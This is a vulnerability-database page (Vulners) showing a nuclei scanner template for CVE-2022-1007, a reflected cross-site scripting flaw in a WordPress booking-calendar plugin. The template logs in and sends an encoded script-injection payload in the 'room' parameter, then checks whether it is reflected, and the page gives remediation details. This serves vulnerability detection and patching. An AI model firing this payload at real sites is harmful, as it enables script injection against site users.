Lucene search
K

WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting

🗓️ 12 Jun 2026 03:02:50Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-1007
11 Apr 202215:15
attackerkb
CNNVD
WordPress plugin advanced-booking-calendar 跨站脚本漏洞
11 Apr 202200:00
cnnvd
CNVD
WordPress advanced-booking-calendar plugin跨站脚本漏洞
13 Apr 202200:00
cnvd
CVE
CVE-2022-1007
11 Apr 202214:41
cve
Cvelist
CVE-2022-1007 Advanced Booking Calendar < 1.7.1 - Reflected Cross-Site Scripting
11 Apr 202214:41
cvelist
EUVD
EUVD-2022-24357
3 Oct 202520:07
euvd
NVD
CVE-2022-1007
11 Apr 202215:15
nvd
Prion
Cross site scripting
11 Apr 202215:15
prion
RedhatCVE
CVE-2022-1007
22 May 202522:18
redhatcve
wpexploit
Advanced Booking Calendar < 1.7.1 - Reflected Cross-Site Scripting
21 Mar 202200:00
wpexploit
Rows per page
id: CVE-2022-1007

info:
  name: WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting
  author: 8arthur
  severity: medium
  description: |
    WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the user.
  remediation: |
    Update to WordPress Advanced Booking Calendar plugin version 1.7.1 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
    - https://wordpress.org/plugins/advanced-booking-calendar/
    - https://nvd.nist.gov/vuln/detail/cve-2022-1007
    - https://plugins.trac.wordpress.org/changeset/2695427
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1007
    cwe-id: CWE-79
    epss-score: 0.03659
    epss-percentile: 0.88152
    cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: elbtide
    product: advanced_booking_calendar
    framework: wordpress
  tags: cve,cve2022,wp-plugin,advanced-booking-calendar,wp,authenticated,wpscan,wordpress,xss,elbtide,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body_2, '<script>alert(document.domain)</script>')"
          - "contains(body_2, 'advanced-booking-calendar')"
          - "contains(header_2, 'text/html')"
          - "status_code_2 == 200"
        condition: and
# digest: 4b0a00483046022100be2f12cc98035f36e984a3efad9c8479f519a929e60a816a94be0892bb01b6e0022100dee4d79b907daae8666e138f52636327dea1a9f4d9272823bdc085043cc90b45:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 24.3
CVSS 3.16.1
EPSS0.03659
17